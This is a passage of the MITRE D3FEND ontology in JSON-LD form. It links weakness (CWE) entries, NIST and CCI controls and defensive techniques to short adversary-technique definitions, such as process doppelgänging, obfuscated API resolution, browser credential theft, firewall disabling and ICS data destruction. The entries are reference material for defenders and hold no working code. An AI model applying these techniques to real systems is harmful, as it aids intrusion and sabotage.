      "rdfs:label": "Exfiltration Over Web Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExfiltrationTechnique"
        },
        {
          "@id": "_:N54ba176b0c2242deacfa12d6fddc47c9"
        }
      ]
    },
    {
      "@id": "_:N54ba176b0c2242deacfa12d6fddc47c9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetWebTraffic"
      }
    },
    {
      "@id": "d3f:Reference-UseDNSPolicyForApplyingFiltersOnDNSQueries",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/windows-server/networking/dns/deploy/apply-filters-on-dns-queries"
      },
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-title": "Use DNS Policy for Applying Filters on DNS Queries",
      "rdfs:label": "Reference - Use DNS Policy for Applying Filters on DNS Queries"
    },
    {
      "@id": "d3f:CWE-344",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-344",
      "d3f:definition": "The product uses a constant value, name, or reference, but this value can (or should) vary across different environments.",
      "rdfs:label": "Use of Invariant Value in Dynamically Changing Context",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-330"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-7_3",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Unsuccessful Logon Attempts | Biometric Attempt Limiting",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:AccountLocking"
      },
      "rdfs:label": "AC-7(3)"
    },
    {
      "@id": "d3f:LinuxRename",
      "@type": "owl:Class",
      "d3f:definition": "Change the name or location of a file.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/rename.2.html"
      },
      "rdfs:label": "Linux Rename",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIMoveFile"
      }
    },
    {
      "@id": "d3f:GetForegroundWindow",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GetOpenWindows"
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getforegroundwindow"
      },
      "rdfs:label": "Get Foreground Window"
    },
    {
      "@id": "d3f:T1055.013",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1055.013",
      "d3f:definition": "Adversaries may inject malicious code into process via process doppelgänging in order to evade process-based defenses as well as possibly elevate privileges. Process doppelgänging is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "Process Doppelgänging",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:N1c78908b827b49f3b52aa5b2448cb166"
        }
      ]
    },
    {
      "@id": "_:N1c78908b827b49f3b52aa5b2448cb166",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:RD-0002.02",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0002.02",
      "d3f:definition": "Third-party networks (commercial ground stations, hosted modems, cloud-integrated ground-station services) present attractive stepping-stones: they already have vetted RF chains, globally distributed apertures, and trusted IP space. Adversaries may acquire customer credentials via phishing or purchase, exploit weak vetting to create front-company accounts, or compromise provider portals/APIs to submit schedules, alter front-end settings, or exfiltrate collected data. Because traffic originates from “expected” stations and ASN ranges, misuse blends into normal operations. Multi-tenant risks include configuration bleed-over and shared management planes.",
      "rdfs:label": "3rd Party Ground System - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0002/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0002"
      },
      "skos:prefLabel": "3rd Party Ground System"
    },
    {
      "@id": "d3f:CWE-457",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-457",
      "d3f:definition": "The code uses a variable that has not been initialized, leading to unpredictable or unintended results.",
      "rdfs:label": "Use of Uninitialized Variable",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-908"
      }
    },
    {
      "@id": "d3f:Reference-TechniquesForImpedingAndDetectingNetworkThreats_VerisignInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10904273B1/"
      },
      "d3f:kb-abstract": "Infinite DNS decoy trap resource to catch threats scanning for network resources to attack.\n\nIn various embodiments, a name server transmits a canonical name as resolution to another canonical name. In operation, when a resource name is requested for resolution, a determination is made that the resource name corresponds to a trap resource name. A first canonical name is transmitted as resolution to the trap resource name. The first canonical name is requested for resolution, and a second canonical name is transmitted as resolution. By providing trap canonical names as resolutions to trap canonical names, unauthorized software making the resolution requests is kept occupied with requesting resolution of canonical name after canonical name, impeding the ability of the unauthorized software from traversing a network.",
      "d3f:kb-author": "Ben McCarty, James Graham",
      "d3f:kb-mitre-analysis": "MITRE Analysis was not found.",
      "d3f:kb-organization": "Verisign Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyNetworkResource"
      },
      "d3f:kb-reference-title": "Techniques for impeding and detecting network threats",
      "rdfs:label": "Reference - Techniques for impeding and detecting network threats - Verisign Inc"
    },
    {
      "@id": "d3f:KerberosTicket",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An access ticket/token issued by a Kerberos system.",
      "rdfs:label": "Kerberos Ticket",
      "rdfs:subClassOf": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:attached-to",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x attached-to y: A subject x is joined in close association to an object y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01980375-s"
      },
      "rdfs:label": "attached-to",
      "rdfs:seeAlso": {
        "@id": "d3f:connects"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:Action",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An Action is a deliberate operation or activity performed by an entity.",
      "rdfs:label": "Action",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Event"
        },
        {
          "@id": "_:Nf1cdd86e97314e64894e834288c2cff9"
        }
      ]
    },
    {
      "@id": "_:Nf1cdd86e97314e64894e834288c2cff9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-agent"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Agent"
      }
    },
    {
      "@id": "d3f:T0804",
      "@type": "owl:Class",
      "d3f:attack-id": "T0804",
      "d3f:definition": "Adversaries may block or prevent a reporting message from reaching its intended target. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. By blocking these reporting messages, an adversary can potentially hide their actions from an operator.",
      "rdfs:label": "Block Reporting Message - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Block Reporting Message"
    },
    {
      "@id": "d3f:used-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x used-by y: The inverse of y uses x.",
      "owl:inverseOf": {
        "@id": "d3f:uses"
      },
      "rdfs:label": "used-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CodecLibrary",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software component that encodes or decodes a data stream of signal.",
      "rdfs:label": "Codec Library",
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwareLibrary"
      }
    },
    {
      "@id": "d3f:T1027.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.007",
      "d3f:definition": "Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts.",
      "rdfs:label": "Dynamic API Resolution",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:ContentModification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ContentModification"
      ],
      "d3f:d3fend-id": "D3-CM",
      "d3f:definition": "Modify content that does not comply with policy.",
      "d3f:filters": [
        {
          "@id": "d3f:DigitalMedia"
        },
        {
          "@id": "d3f:FileContentBlock"
        },
        {
          "@id": "d3f:FileMetadata"
        }
      ],
      "d3f:kb-article": "## How it works\n\nWhen content is found to not comply with it's content policy, it may be transformed to a safer state by modifying it.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForContentDisarmandReconstruction_OPSWATInc"
      },
      "d3f:modifies": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Content Modification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ContentFiltering"
        },
        {
          "@id": "_:N0ba6229a2f6e425bbb14604183f05a53"
        },
        {
          "@id": "_:N73134d72b04e424c90b7c4b793d43873"
        },
        {
          "@id": "_:N01f275438d6e4444a409e7d8eca4f452"
        },
        {
          "@id": "_:Ne3f347da35034693b86e79727bd368e7"
        }
      ]
    },
    {
      "@id": "_:N0ba6229a2f6e425bbb14604183f05a53",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DigitalMedia"
      }
    },
    {
      "@id": "_:N73134d72b04e424c90b7c4b793d43873",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileContentBlock"
      }
    },
    {
      "@id": "_:N01f275438d6e4444a409e7d8eca4f452",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:filters"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileMetadata"
      }
    },
    {
      "@id": "_:Ne3f347da35034693b86e79727bd368e7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:DatabaseService",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A database service interacts with a database, either retrieving data through queries or making modifications to its contents.",
      "d3f:executes": {
        "@id": "d3f:DatabaseQuery"
      },
      "d3f:manages": {
        "@id": "d3f:Database"
      },
      "rdfs:label": "Database Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplicationProcess"
        },
        {
          "@id": "_:N00289ab89559417e95f277215a5c73c3"
        },
        {
          "@id": "_:N121cfa0dff644d608e139a8002afe0c7"
        }
      ]
    },
    {
      "@id": "_:N00289ab89559417e95f277215a5c73c3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseQuery"
      }
    },
    {
      "@id": "_:N121cfa0dff644d608e139a8002afe0c7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "d3f:DecisionTree",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DT",
      "d3f:definition": "Decision tree learning is a supervised learning approach used in statistics, data mining, and machine learning. In this formalism, a classification or regression decision tree is used as a predictive model to draw conclusions about a set of observations.",
      "d3f:kb-article": "## How it works\n\nA decision tree starts with a root node, which does not have any incoming branches. The outgoing branches from the root node then feed into the internal nodes, also known as decision nodes. Based on the available features, both node types conduct evaluations to form homogenous subsets, which are denoted by leaf nodes, or terminal nodes. The leaf nodes represent all the possible outcomes within the dataset.\n\n## Considerations\n\nWhile the basic underlying model is that of a decision tree, the decision tree node criteria, and the method for identifying splits varies significantly depending on the learning algorithm selected (e.g., CART, ID3, C4.5, C5.0, CHAID, MARS.)  Extensions like linear and logistic trees can add additional expressiveness as well.\n\n## Key Test Considerations\n\n- **Machine Learning**:\n\n  - **Verify the dataset quality**: Check the data to make sure it is\n      free of errors.  Quantify the degree of missing values,\n      outliers, and noise in the data collection.  If the data quality\n      is low, it may be difficult or impossible to create models and\n      systems with the desired performance.\n\n  - **Verify development datasets are representative**: of expected\n      operational environment and data collection means.  Compare\n      distributions of dataset features and labels with exploratory\n      data analysis and assess the difference in tests on training\n      data and tests on evaluation data (where the evaluation data\n      must be drawn from a representative dataset.)\n\n   - **Use a variety of data sets**: where available and applicable, to\n      reflect different operating and environment conditions that are\n      likley to be be encountered.\n\n  - **Use software libraries**: and tools built for ML where possible, so\n      that the underlying code is verified by prior use.**\n\n  - **Diagnose model errors with domain SMEs**: Have problem domain\n    SMEs investigate model errors for conditions for which the model\n    may underperform and suggest refinements.\n\n- **Classification**:\n\n  - **Use Standard Classification Performance Measures**: Not all of\n      the following may be necessary, but should be considered for\n      both verification (developmental test) and operational test\n      stages use:\n\n    - **Accuracy**: The fraction of predictions that were corret.\n\n    - **Precision**: The proportion of positive identifications that were correct.\n\n    - **Recall**: The proportion of actual positive cases identified correctly.\n\n    - **F-Measure**: Combines the preicion and recall into a single\n        score.  It is the harmonic mean of the precision and recall.\n\n    - **Receiver Operating Characteristic (ROC) Curve**: A ROC curve\n        shows the performance of a classification model at all\n        classification thresholds.  It graphs the True Positive Rate\n        over the False Positive Rate.\n\n    - **Area Under the ROC Curve (AUC)**: This measures the\n        two-dimensional area under the ROC Curve.  AUC is\n        scale-invariant and classification-threshold invariant.\n\n    - **ROC TP vs FP points**: In addition to a specific AUC score,\n        the performance at points\n\n    - **Confusion Matrix**: A confusion matrix is a table layout that\n        allows the visualization of the performance of an\n        algorithm. Each row of the matrix represents the instances in\n        an actual class while each column represents the instances in\n        a predicted class, or vice versa. It is a special kind of\n        contingency table, with two dimensions (\"actual\" and\n        \"predicted\"), and identical sets of \"classes\" in both\n        dimensions (each combination of dimension and class is a\n        variable in the contingency table.)\n\n  - **Prediction Bias**: The difference between the average of the\n      predicted labels and the average of the labels in the data\n      set.  One should check for prediction bias when evaluating the\n      classifier's results. Causes of bias can include:\n\n    - **Noisy data set**: Errors in original data can as the\n      collection method may have an underlying bias.\n\n    - **Processing bug**: Errors in the data pipeline can\n      introduce bias.\n\n    - **Biased training sample (unbalanced samples)**: Model\n      parameters may be skewed towards majority classes.\n\n    - **Overly strong regularization**: Model may be underfitting\n       model and too simple.\n\n    - **Proxy variables**: Model features may be highly\n       correlated.\n\n- **Supervised Learning**:\n\n  - **Overfitting and Underfitting**: Overfitting occurs when the the\n    model built corresponds too closely or exactly to a particular\n    set of data, and thus may fail to fit to predict additional data\n    reliably. An overfitted model is a mathematical model that\n    contains more parameters than can be justified by the data.\n    Underfitting occurs when the model built does adequately capture\n    the patterns in the data. As an example, a linear model will\n    underfit a non-linear dataset.\n\n  - **Sensitivity**: Perform N-fold Cross validation to indicate how\n    much sensitivity the algorithm has to data variation and to avoid\n    overfitting operational models.\n\n- **Decision Tree Learning**:\n\n  - **Sensitive to unbalanced classes**: Examine and determine target\n      class balance; decision tree learning algorithms are especially\n      sensitive to unbalanced target classes.\n\n  - **Consider decision boundaries**: Perform exploratory data\n      analysis to determine if decision boundaries lie alongaxes of\n      features. _Decision trees are ideal when decision boundaries can\n      be found that lie along axes of features._\n\n   - **Decision tree overfitting** may require tuning algorithm hyperparameters such as tree depth, max features used, max leaf nodes, etc.\n\n   - **Pruning** may result in a more robust model in real-word applications.\n\n   - **Missing values**: Inspect the data set to determine if there\n     are missing values and select a means to address them, either by\n     choosing an algorithm that works well or a way to impute the\n     value or eliminate the missing values in the data sensors or\n     pipeline.\n\n## Platforms, Tools, or Libraries\n\n- **scikit-learn**: includes tree algorithms for ID3, C4.5, C5.0, and CART.\n\n- **Weka**: includes J48 (C4.5), SimpleCart (CART), Logistic Model Trees, Naive Bayes Trees, and more.\n\n### Validation Approach\n- Use operationally relevant data across the range of application's operating environment.\n- Incorporate some kind of continuous validation to address concept drift and the need to retrain the model and/or check data quality.\n\n## References\n1. Decision tree learning. (2023, May 30). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Decision_tree_learning).\n2. Decision Trees. (n.d.). In _scikit-learn User Guide 1.2.2_. [Link](https://scikit-learn.org/stable/modules/tree.html).\n3. Concept drift. (2023, April 17). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Concept_drift).\n4. 8 Concept Drift Detection Methods. (n.d.). In _Aporia Learning Center_. [Link](https://www.aporia.com/learn/data-drift/concept-drift-detection-methods/).",
      "rdfs:label": "Decision Tree",
      "rdfs:subClassOf": {
        "@id": "d3f:Classification"
      }
    },
    {
      "@id": "d3f:ApplicationDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the removal of an application from a system, ensuring its binaries, configuration files, and registry entries are deleted or deactivated.",
      "rdfs:label": "Application Deletion Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:N3d45f72099534750bbf9ae09e058136f"
        }
      ]
    },
    {
      "@id": "_:N3d45f72099534750bbf9ae09e058136f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationInstallationEvent"
      }
    },
    {
      "@id": "d3f:T0879",
      "@type": "owl:Class",
      "d3f:attack-id": "T0879",
      "d3f:definition": "Adversaries may cause damage and destruction of property to infrastructure, equipment, and the surrounding environment when attacking control systems. This technique may result in device and operational equipment breakdown, or represent tangential damage from other techniques used in an attack. Depending on the severity of physical damage and disruption caused to control processes and systems, this technique may result in [Loss of Safety](https://attack.mitre.org/techniques/T0880). Operations that result in [Loss of Control](https://attack.mitre.org/techniques/T0827) may also cause damage to property, which may be directly or indirectly motivated by an adversary seeking to cause impact in the form of [Loss of Productivity and Revenue](https://attack.mitre.org/techniques/T0828).",
      "rdfs:label": "Damage to Property - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSImpactTechnique"
      },
      "skos:prefLabel": "Damage to Property"
    },
    {
      "@id": "d3f:CWE-212",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-212",
      "d3f:definition": "The product stores, transfers, or shares a resource that contains sensitive information, but it does not properly remove that information before the product makes the resource available to unauthorized actors.",
      "rdfs:label": "Improper Removal of Sensitive Information Before Storage or Transfer",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-669"
      }
    },
    {
      "@id": "d3f:AML.T0089",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0089",
      "d3f:definition": "Adversaries may attempt to get information about processes running on a system. Once obtained, this information could be used to gain an understanding of common AI-related software/applications running on systems within the network. Administrator or otherwise elevated access may provide better process details.\n\nIdentifying the AI software stack can then lead an adversary to new targets and attack pathways. AI-related software may require application tokens to authenticate with backend services. This provides opportunities for [Credential Access](/tactics/AML.TA0013) and [Lateral Movement](/tactics/AML.TA0015).\n\nIn Windows environments, adversaries could obtain details on running processes using the Tasklist utility via cmd or `Get-Process` via PowerShell. Information about processes can also be extracted from the output of Native API calls such as `CreateToolhelp32Snapshot`. In Mac and Linux, this is accomplished with the `ps` command. Adversaries may also opt to enumerate processes via `/proc`.",
      "rdfs:label": "Process Discovery - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0089"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASDiscoveryTechnique"
      },
      "skos:prefLabel": "Process Discovery"
    },
    {
      "@id": "d3f:DNSCacheEviction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DNSCacheEviction"
      ],
      "d3f:d3fend-id": "D3-DNSCE",
      "d3f:definition": "Flushing DNS to clear any IP addresses or other DNS records from the cache.",
      "d3f:deletes": {
        "@id": "d3f:DNSRecord"
      },
      "d3f:kb-article": "# How it works\n\nFlushing the DNS Cache will clear the IP addresses of websites you have visited recently. This can help remediate DNS Cache Poisoning attacks, which is a type of cyber attack where corrupted DNS data is inserted into the cache, causing redirects to malicious websites.\n\nOn windows, the DNS cache can be wiped by issuing the command `ipconfig /flushdns`.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-EvictionGuidanceforNetworksAffectedbytheSolarWindsandActiveDirectory/M365Compromise-CISA"
      },
      "d3f:synonym": "Flush DNS Cache",
      "rdfs:label": "DNS Cache Eviction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ObjectEviction"
        },
        {
          "@id": "_:N2b4abec528b04f448e62b67e75041413"
        }
      ]
    },
    {
      "@id": "_:N2b4abec528b04f448e62b67e75041413",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DNSRecord"
      }
    },
    {
      "@id": "d3f:T1503",
      "@type": "owl:Class",
      "d3f:attack-id": "T1503",
      "d3f:definition": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.  (Citation: Talos Olympic Destroyer 2018)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1555.003",
      "rdfs:label": "Credentials from Web Browsers",
      "rdfs:seeAlso": {
        "@id": "d3f:T1555.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CredentialAccessTechnique"
      }
    },
    {
      "@id": "d3f:OutboundInternetWebTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound internet web traffic is network traffic that is: (a) on an outgoing connection initiated from a host within a network to a host outside the network, and (b) using a standard web protocol.",
      "d3f:may-contain": {
        "@id": "d3f:URL"
      },
      "rdfs:label": "Outbound Internet Web Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Internetworking"
        },
        {
          "@id": "https://schema.ocsf.io/objects/http_request"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OutboundInternetNetworkTraffic"
        },
        {
          "@id": "d3f:WebNetworkTraffic"
        },
        {
          "@id": "_:N67de5dd76a2746eeb900653bf512c014"
        }
      ]
    },
    {
      "@id": "_:N67de5dd76a2746eeb900653bf512c014",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:CWE-315",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-315",
      "d3f:definition": "The product stores sensitive information in cleartext in a cookie.",
      "rdfs:label": "Cleartext Storage of Sensitive Information in a Cookie",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-312"
      }
    },
    {
      "@id": "d3f:RegSetValueA",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SetSystemConfigValue"
      ],
      "rdfs:label": "RegSetValueA"
    },
    {
      "@id": "d3f:T1562.013",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1562.013",
      "d3f:definition": "Adversaries may disable network device-based firewall mechanisms entirely or add, delete, or modify particular rules in order to bypass controls limiting network usage.",
      "d3f:disables": {
        "@id": "d3f:Firewall"
      },
      "rdfs:label": "Disable or Modify Network Device Firewall",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1562"
        },
        {
          "@id": "_:N9ad75cd8e1a240a8961d9f364b35b45f"
        }
      ]
    },
    {
      "@id": "_:N9ad75cd8e1a240a8961d9f364b35b45f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:disables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firewall"
      }
    },
    {
      "@id": "d3f:T0809",
      "@type": "owl:Class",
      "d3f:attack-id": "T0809",
      "d3f:definition": "Adversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. (Citation: Enterprise ATT&CK January 2018)",
      "rdfs:label": "Data Destruction - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Data Destruction"
    },
    {
      "@id": "d3f:Agent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An entity capable of performing intentional actions.",
      "rdfs:label": "Agent",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/actor"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:CCI-001185_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system invalidates session identifiers upon user logout or other session termination.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:AuthenticationCacheInvalidation"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001185"
    },
    {
      "@id": "d3f:Classifying",
      "@type": "owl:Class",
      "rdfs:label": "Classifying",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticalPurpose"
      }
    },
    {
      "@id": "d3f:verifies",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x verifies y: The technique x confirms the truth of a digital artifact y.",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/00666401-v"
      },
      "rdfs:label": "verifies",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Formal_verification"
        },
        {
          "@id": "dbr:Runtime_verification"
        },
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00665271-v"
        }
      ],
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:analyzes"
        },
        {
          "@id": "d3f:associated-with"
        }
      ]
    },
    {
      "@id": "d3f:CWE-259",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-259",
      "d3f:definition": "The product contains a hard-coded password, which it uses for its own inbound authentication or for outbound communication to external components.",
      "rdfs:label": "Use of Hard-coded Password",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-798"
      }
    },
    {
      "@id": "d3f:CCI-000192_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces password complexity by the minimum number of upper case characters used.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:StrongPasswordPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000192"
    },
    {
      "@id": "d3f:CWE-1296",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1296",
      "d3f:definition": "The product's debug components contain incorrect chaining or granularity of debug components.",
      "rdfs:label": "Incorrect Chaining or Granularity of Debug Components",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:DHCPAckEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a DHCP server sends an ACK message to acknowledge a client's REQUEST, confirming the allocation of an IP address and associated network settings.",
      "rdfs:label": "DHCP Ack Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DHCPEvent"
        },
        {
          "@id": "_:N8ab95490d6ba4c53b0092847b72f7d0b"
        }
      ],
      "skos:altLabel": "DHCPACK"
    },
    {
      "@id": "_:N8ab95490d6ba4c53b0092847b72f7d0b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPRequestEvent"
      }
    },
    {
      "@id": "d3f:KerberosTicketGrantingServiceTicket",
      "@type": "owl:Class",
      "d3f:definition": "A Kerberos ticket-granting service (TGS) ticket is given in response to requesting a Kerberos TGS request.",
      "rdfs:label": "Kerberos Ticket Granting Service Ticket",
      "rdfs:subClassOf": {
        "@id": "d3f:KerberosTicket"
      },
      "skos:altLabel": "TGS Ticket"
    },
    {
      "@id": "d3f:OTSecurityCommand",
      "@type": "owl:Class",
      "d3f:definition": "Ensure confidentiality, integrity, or availability of system information.",
      "rdfs:comment": [
        "BACnet: authenticate\nBACnet: requestKey ",
        "GE-SRTP: PROGRAMMER LOGON"
      ],
      "rdfs:label": "OT Security Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTNetworkManagementCommand"
      }
    },
    {
      "@id": "d3f:ProcessAccessEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where one process interacts with another, such as reading memory, inspecting state, or altering behavior.",
      "rdfs:label": "Process Access Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEvent"
        },
        {
          "@id": "_:Na90fb385f37a40499a9947fd76e69060"
        }
      ]
    },
    {
      "@id": "_:Na90fb385f37a40499a9947fd76e69060",
      "@type": "owl:Restriction",
